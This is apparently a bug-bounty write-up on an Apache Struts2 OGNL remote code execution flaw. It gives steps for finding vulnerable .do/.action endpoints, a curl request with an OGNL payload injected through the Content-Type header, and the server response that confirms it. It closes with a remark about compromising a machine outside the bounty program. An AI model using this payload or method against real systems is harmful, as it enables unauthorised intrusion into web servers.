Bug Name :- RCE Bug Priority :- Critical Bounty :- $2500
org.apache.struts:struts2-core is a popular open-source framework for developing web applications in the Java programming language. Affected versions of this package are vulnerable to Remote Code Execution (RCE). Forced double OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution. Affecting org.apache.struts:struts2-coreOpen this link in a new tab package, versions [2.0.0, 2.5.22)
1) Do Spider or Crawl 2) Check the applications is build with JAVA 3) Check for the file extension .Do , .action , .go & jsp 4) insert OGNL payloads in Content Type GET or POST Parameters End points 5) If u get Resposne header Vulnerable
Set the target in burp now go to spider tab and add ognl payload start spider . if any endpoint are vulnerable then if automaticaly show response header after spider now open search tab , select in scope and show response header now search for the response header
https://github.com/karthi-the-hacker/PayloadAllTheThings
curl -i -s -k -X $'GET' \ -H $'Host: target.com' -H $'User-Agent: Chrome/89.0.4389.114 Safari/537.36' -H $'Connection: close' -H $'Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*' -H $'Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1' -H $'Content-Type: %{#context [\'com.opensymphony.xwork2. dispatcher.HttpServletResponse\'] .addHeader(\'Hacker\', \'karthithehacker \')}.multipart/form-data' -H $'Accept-Encoding: gzip, deflate' \ $'https://target.com/'
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Expires: XXXXX
Hacker: karthithehacker
Set-Cookie: JSESSIONID=XXXXX
Content-Type: text/html
Transfer-Encoding: chunked
Date: XXXXXX
Connection: close
Remote code execution (RCE) attacks allow an attacker to remotely execute malicious code on a computer. The impact of an RCE vulnerability can range from malware execution to an attacker gaining full control over a compromised machine.
Always look for .do .action and jsp files
In this POC video i have shown how i Sucessfully Exploited RCE . im not disclousing any of the private program information here .This video i have compromise machine which is not in the private program